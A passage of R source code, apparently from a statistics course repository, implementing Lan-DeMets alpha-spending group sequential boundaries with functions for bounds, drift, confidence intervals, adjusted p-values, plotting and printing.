b[,1:6] <- c(z$time, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
else{
b <- matrix(NA, p, 7)
b[,1:7] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
class(ans) <- "summary.bounds"
return(ans)
}
"summary.drift" <-
function (object, ...)
{
z <- object
if (!inherits(z, "drift"))
stop("'object' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 5)
b[,1:5] <- c(z$time, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 6)
b[,1:6] <- c(z$time, z$time2, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
class(ans) <- "summary.drift"
return(ans)
}
## Local Variables:
## End:
| /FinalExam/ldbounds.R | no_license | snandi/Stat641_Fall2015 | R | false | false | 35,613 | r | ## Program Name: ldbounds.R##
## Package ldbounds.R (unreleased version) ##
"bounds" <-
function(x,t2=x,iuse=1,asf=NULL,alpha=0.05,phi=rep(1,length(alpha)),sides=2,ztrun=rep(8,length(alpha))){
if (!is.numeric(x)){
stop("'x' must be a vector of analysis times or the number of analysis times")
}
if (length(x)==1){
t <- (1:x)/x
if (t2==x){
t2 <- t
}
}
else{
t <- x
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)&(length(iuse) != length(asf))){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (length(asf)==2){
if ({class(asf[[1]])!="function"}|{class(asf[[2]])!="function"}){
stop("Alpha spending function must be of class 'function'.")
}
alpha[1] <- asf[[1]](1)
alpha[2] <- asf[[2]](1)
}
if (length(asf)==1){
if (class(asf)!="function"){
stop("Alpha spending function must be of class 'function'.")
}
alpha <- asf(1)
}
if (sum(iuse==5)<length(asf)){
stop("Can't specify 2 spending functions unless iuse=c(5,5).")
}
if ({sum(iuse==5)>0}&{length(asf)==0}){
stop("If iuse=5, must specify spending function.")
}
if (sum({iuse==3}|{iuse==4}) > length(phi)){
stop("Phi must be specified for each boundary that uses spending function 3 or 4.")
}
if (sum({iuse==3}&{phi <= 0}) > 0){
stop("For power family (iuse=3), phi must be positive.")
}
if (sum({iuse==4}&{phi==0}) > 0){
stop("For Hwang-Shih-DeCani family (iuse=4), phi cannot be 0.")
}
if (length(phi)==1) phi <- rep(phi,2)
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}&{length(asf)!=2}&{ztrun[1]==ztrun[2]}&{{length(phi)==1}|{phi[1]==phi[2]}}}){
if ({length(alpha)==1}&{sides==1}){
type <- 1
alph <- alpha
}
if ({length(alpha)==1}&{sides==2}){
type <- 2
alph <- alpha
}
if (length(alpha)==2){
type <- 2
alph <- 2*alpha[1]
}
ld <- landem(t,t2,sides,iuse[1],asf,alph,phi[1],ztrun[1])
ubnd <- ld$upper.bounds
lbnd <- ld$lower.bounds
epr <- ld$exit.pr
dpr <- ld$diff.pr
spend <- ld$spend
}
else{
type <- 3
ld1 <- landem(t,t2,1,iuse[1],asf[[1]],alpha[1],phi[1],ztrun[1])
ld2 <- landem(t,t2,1,iuse[2],asf[[2]],alpha[2],phi[2],ztrun[2])
lbnd <- -ld1$upper.bounds
ubnd <- ld2$upper.bounds
epr <- ld1$exit.pr+ld2$exit.pr
dpr <- ld1$diff.pr+ld2$diff.pr
spend <- c(ld1$spend,ld2$spend)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"alphas" <-
function(iuse,asf,alpha,phi,side,t){
tol <- 10^(-13)
if (iuse==1){
pe <- 2*(1-pnorm(qnorm(1-(alpha/side)/2)/sqrt(t)))
spend <- "O'Brien-Fleming"
}
else if (iuse==2){
pe <- (alpha/side)*log(1+(exp(1)-1)*t)
spend <- "Pocock"
}
else if (iuse==3){
pe <- (alpha/side)*t^phi
spend <- "Power Family: alpha * t^phi"
}
else if (iuse==4){
pe <- (alpha/side)*(1-exp(-phi*t))/(1-exp(-phi)) ### TDC - inserted "-"
spend <- "Hwang-Shih-DeCani Family"
}
else if (iuse==5){
if(missing(alpha)) alpha <- asf(1)
if(any(diff(asf(t))<=0.0000001))
stop("Alpha Spending function must an increasing function.")
if(asf(1)>1 ) stop("Alpha Spending function must be less than or equal to 1.")
spend <- "User-specified spending function"
pe <- (1/side)*asf(t)
}
else stop("Must choose 1, 2, 3, 4, or 5 as spending function.")
pe <- side*pe
pd <- pe-c(0,pe[-length(pe)])
if (sum(as.integer({pd<0.0000001*(-1)}|{pd>1.0000001})) >= 1){
warning("Spending function error")
pd <- min(1,pd)
pd <- max(0,pd)
}
for (j in 1:length(pd)){
if (pd[j] < tol){
warning("Type I error spent too small for analysis #",j,"\n",
"Zero used as approximation for ",pd[j])
pd[j] <- 0
}
}
ans <- list(pe=pe,pd=pd,spend=spend)
return(ans)
}
"drift" <-
function(t,za=NULL,zb=NULL,t2=x,pow=NULL,drft=NULL,conf=NULL,pval=NULL,pvaltime=NULL,zval=zb[length(zb)]){
if (inherits(t, "bounds")){
za <- t$lower.bounds
zb <- t$upper.bounds
t2 <- t$time2
t <- t$time
}
else {
if(length(t)==1){
if(abs(t - round(t)) < .0000001 & t > 1) t <- 1:t/t
else if(t>1) stop("t must be an integer or in (0,1]")}
if(missing(t2)) t2 <- t
else if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
if ({min(t) <= 0}|{max(t) > 1}|{min(t2) <= 0}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}}
if (sum({t-c(0,t[-length(t)]) <= 0}|{t2-c(0,t[-length(t2)]) <= 0}) > 0){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({is.null(za)}&{!is.null(zb)})
za <- -zb
t3 <- t2
t2 <- t2/max(t2)
if (!is.null(pow)+!is.null(drft)+!is.null(conf)+!is.null(pval)!=1){
stop("Only one of power, drift, confidence level, or p-value ordering can be given.")
}
else if (is.null(pow)&is.null(drft)&is.null(conf)&is.null(pval)){
drft=0
}
drift1 <- NULL
if (!is.null(pow)){
if ({pow <= 0}|{pow > 1}){
stop("Power must be in (0,1].")
}
type <- 1
drift1 <- adrift(t2,za,zb,pow)
}
if (!is.null(drft)){
type <- 2
drift1 <- drft
}
if (!is.null(drift1)){
gl <- glan(t2,za,zb,drift1)
if (!is.null(drft)) pow <- gl$pr
ans <- list(type=type,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,power=pow,
drift=drift1,lower.probs=gl$qneg,upper.probs=gl$qpos,
exit.probs=gl$qneg+gl$qpos,cum.exit=cumsum(gl$qneg+gl$qpos))
}
if (!is.null(conf)){
if (zval < 0){
stop("Confidence interval is only for nonnegative final Z value.")
}
conf.limit <- ci(conf,zval,t2,za,zb)
ans <- list(type=3,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,final.zvalue=zval,conf.interval=conf.limit)
}
if (!is.null(pval)){
if (zval < 0){
stop("P-value is only for nonnegative Z value.")
}
p.value <- adj.p(pval,pvaltime,zval,t2,zb)
ans <- list(type=4,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,analysis.time=pvaltime,final.zvalue=zval,p.ordering=pval,p.value=p.value)
}
class(ans) <- "drift"
return(ans)
}
"adj.p" <-
function(pval,pvaltime,zval,t,up.bound){
if (!pval%in%c("SW","LR")){
stop("Possible p-value orderings are stagewise (SW) and likelihood ratio (LR).")
}
if (is.null(pvaltime)){
stop("P-value time must correspond to one of the analysis times.")
}
if (!is.null(pvaltime)){
if (pvaltime>length(up.bound)){
stop("P-value time must correspond to one of the analysis times.")
}
}
if (pval=="SW"){
p.drift <- drift(zb=c(up.bound[1:(pvaltime-1)],zval),za=rep(-10,3),t=t[1:pvaltime],drft=0)
p.value <- summary(p.drift)$bounds1[,'Cum exit pr.'][pvaltime]
}
else{
lr.exit <- rep(0,length(up.bound))
maxval1 <- max(up.bound[1],zval)
lr1 <- drift(zb=maxval1,za=-10,t=t[1],drft=0)
lr.exit[1] <- lr1$exit[1]
for (j in 1:(length(up.bound)-1)){
maxval <- max(up.bound[j+1],zval)
lr <- drift(zb=c(up.bound[1:j],maxval),za=rep(-10,j+1),t=t[1:(j+1)],drft=0)
lr.exit[j+1] <- lr$exit[j+1]
}
p.value <- sum(lr.exit)
}
return(p.value)
}
"adrift" <-
function(t,za,zb,pow){
dr <- (zb[length(t)]+qnorm(pow))/sqrt(t[length(t)])
drft <- bisect(t,za,zb,pow,dr)
return(drft)
}
"bisect" <-
function(t,za,zb,target,drft=0,upper=FALSE){
tol <- 0.000001
dl <- 0.25
gotlo <- 0
gothi <- 0
prev <- 0
pr <- 0
while ({abs(pr-target) > tol}&{abs(drft-prev) > tol/10}){
glan.out <- glan(t,za,zb,drft)
if (upper){
pr <- sum(glan.out$qpos)
}
if (!upper){
pr <- glan.out$pr
}
if (pr > target+tol){
hi <- drft
drft <- drft-dl
gothi <- 1
}
if (pr < target-tol){
lo <- drft
drft <- drft+dl
gotlo <- 1
}
if ({gothi==1}&{gotlo==1}){
prev <- drft
drft <- (lo+hi)/2
}
}
if ({abs(drft-prev) <= tol/10}&{abs(pr-target) > tol}){
warning("Convergence problem")
}
return(drft)
}
"bsearch" <-
function(last,nints,i,pd,stdv,ya,yb){
tol <- 10^(-7)
del <- 10
uppr <- yb[i-1]
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
while (abs(q-pd) > tol){
del <- del/10
incr <- 2*as.integer(q > pd+tol)-1
j <- 1
while (j <= 50){
uppr <- uppr+incr*del
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
if ({abs(q-pd) > tol}&{j==50}){
stop("Error in search: not converging")
}
else if ({{incr==1}&{q <= pd+tol}}|{{incr==-1}&{q >= pd-tol}}){
j <- 50
}
j <- j+1
}
}
ybval <- uppr
return(ybval)
}
"ci" <-
function(conf,value,t,za,zb){
zb[length(t)] <- value
zcrit <- qnorm(1-(1-conf)/2)
limit <- (value+c(-1,1)*zcrit)/sqrt(t[length(t)])
target <- c(0,1)*conf+(1-conf)/2
lim1 <- bisect(t,za,zb,target[1],limit[1],upper=TRUE)
lim2 <- bisect(t,za,zb,target[2],limit[2],upper=TRUE)
lim <- list(lower.limit=lim1,upper.limit=lim2)
return(lim)
}
"commonbounds" <-
function(looks,t=(1:looks)/looks,t2=t,iuse="OF",alpha=0.05,sides=2){
if ({!is.null(looks)}&{!is.numeric(looks)}){
stop("'looks' must be an integer.")
}
if (sum(t==(1:length(t))/length(t))<length(t)){
warning("Time points are not equally spaced.")
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if (sum(!iuse%in%c("PK","OF","HP"))>0){
stop("Boundary type (iuse) must be \"PK\" or \"OF\".")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}}){
if ({length(alpha)==1}&{sides==2}){
alph <- alpha/2
}
else{
alph <- alpha
}
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alph)$root
ubnd <- rep(root,looks)
spend <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alph)$root
ubnd <- root/sqrt((1:looks)/looks)
spend <- "O'Brien-Fleming"
}
if ({length(alpha)==1}&{sides==1}){
type <- 4
lbnd <- rep(-8,length(ubnd))
}
if ({length(alpha)==2}|{{length(alpha)==1}&{sides==2}}){
type <- 5
lbnd <- -1*ubnd
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs
epr <- cumsum(dpr)
}
else{
type <- 6
spend <- c("","")
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*rep(root,looks)
spend[1] <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*root/sqrt((1:looks)/looks)
spend[1] <- "O'Brien-Fleming"
}
if (iuse[2]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- rep(root,looks)
spend[2] <- "Pocock"
}
if (iuse[2]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- root/sqrt((1:looks)/looks)
spend[2] <- "O'Brien-Fleming"
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs+drift.for.probs$lower.probs
epr <- cumsum(dpr)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"cprob" <-
function(last,nints,ya,yb,i,stdv){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1]
grid <- seq(ya[i-1],yb[i-1],length=nints[i-1]+1)
pupr <- (1-pnorm(yb[i],mean=grid,sd=stdv))*last
plow <- pnorm(ya[i],mean=grid,sd=stdv)*last
tqpos <- 0.5*hlast*(2*sum(pupr)-pupr[1]-pupr[length(pupr)]) # This is "trap"
tqneg <- 0.5*hlast*(2*sum(plow)-plow[1]-plow[length(plow)]) # This is "trap"
ans <- list(qpos=tqpos,qneg=tqneg)
return(ans)
}
"fcab" <-
function(last,nints,yam1,h,x,stdv){
f <- last*dnorm(h*c(0:nints)+yam1,mean=matrix(rep(x,nints+1),nints+1,length(x),byrow=TRUE),sd=stdv)
area <- 0.5*h*(2*colSums(f)-f[1,]-f[nrow(f),]) # This is "trap"
return(area)
}
"glan" <-
function(t,za,zb,drft){
h <- 0.05
stdv <- sqrt(t-c(0,t[-length(t)])) # These are subroutine "sd"
sdproc <- sqrt(t) # These are subroutine "sd"
yb <- zb*sdproc-drft*t
ya <- za*sdproc-drft*t
nints <- ceiling((yb-ya)/(h*stdv))
qneg1 <- pnorm(za[1],mean=drft*t[1]/stdv[1])
qpos1 <- 1-pnorm(zb[1],mean=drft*t[1]/stdv[1])
cp <- matrix(0,length(t),2)
cp[1,] <- c(qpos1,qneg1)
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
cpr <- cprob(last,nints,ya,yb,i,stdv[i])
cp[i,] <- c(cpr[[1]],cpr[[2]])
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
pr <- sum(cp)
ans <- list(pr=pr,qpos=cp[,1],qneg=cp[,2])
return(ans)
}
"landem" <-
function(t,t2,side,iuse,asf,alpha,phi,ztrun){
h <- 0.05
zninf <- -8
tol <- 0.0000001
stdv <- sqrt(t2-c(0,t2[-length(t2)])) # These are subroutine "sd"
sdproc <- sqrt(t2) # These are subroutine "sd"
alph <- alphas(iuse,asf,alpha,phi,side,t)
za <- zb <- ya <- yb <- nints <- rep(0,length(t))
pd <- alph$pd
pe <- alph$pe
if (pd[1]==0){
zb[1] <- -zninf
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
else if (pd[1] < 1){
zb[1] <- qnorm(1-pd[1]/side)
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
if (side==1){
za[1] <- zninf
ya[1] <- za[1]*stdv[1]
}
else if (side != 1){
za[1] <- -zb[1]
ya[1] <- -yb[1]
}
nints[1] <- ceiling((yb[1]-ya[1])/(h*stdv[1]))
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
if ({pd[i] < 0}|{pd[i] > 1}){
warning("Possible error in spending function. May be due to truncation.")
pd[i] <- min(1,pd[i])
pd[i] <- max(0,pd[i])
}
if (pd[i] < tol){
zb[i] <- -zninf
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)) pd[i+1] <- pe[i+1]-pe[i]
}
yb[i] <- zb[i]*sdproc[i]
}
else if (pd[i]==1) zb[i] <- yb[i] <- 0
else if ({pd[i] >= tol}&{pd[i] < 1}){
yb[i] <- bsearch(last,nints,i,pd[i]/side,stdv[i],ya,yb)
zb[i] <- yb[i]/sdproc[i]
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)){
pd[i+1] <- pe[i+1]-pe[i]
}
}
yb[i] <- zb[i]*sdproc[i]
}
if (side==1){
ya[i] <- zninf*sdproc[i]
za[i] <- zninf
}
else if (side==2){
ya[i] <- -yb[i]
za[i] <- -zb[i]
}
nints[i] <- ceiling((yb[i]-ya[i])/(h*stdv[i]))
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
ans <- list(lower.bounds=za,upper.bounds=zb,exit.pr=pe,diff.pr=pd,spend=alph$spend)
return(ans)
}
"plot.bounds" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F,...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&{x$bounds.type==1}){
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,l,pch=pch, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"plot.drift" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F, ...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&&{x$bounds.type==1}){ ### TDC added extra "&"
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim,
las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim, las=las, pch=pch,
type=type,...)
points(z,l,pch=19, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"print.bounds" <-
function(object, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 3)
b[,1:3] <- c(z$time, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Lower", "Upper")
}
else{
b <- matrix(NA, p, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
if (ans$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%c(1,4)){
if (ans$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nSpending function:", ans$spending, "\n", "\nBoundaries:\n")
}
if (ans$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nBoundary type (non-alpha-spending):", ans$spending, "\n", "\nBoundaries:\n")
}
if (ncol(ans$bounds)==3)
print.default(ans$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2, ...)
else
print.default(ans$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
else{
if (ans$type==2){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function: ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nSpending function: ", ans$spending, "\n")
}
}
if (ans$type==5){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[1], "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
}
if (ans$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nSpending function for the lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function for the upper boundary: ", ans$spending[2], "\n")
}
if (ans$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", ans$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(ans$bounds, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
}
"print.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "drift"))
stop("'x' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 3)
b[,1:3] <- c(z$time, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", ans$n, "\n")
cat("\nBoundaries: \n")
if ((ans$type==1)|(ans$type==2)){
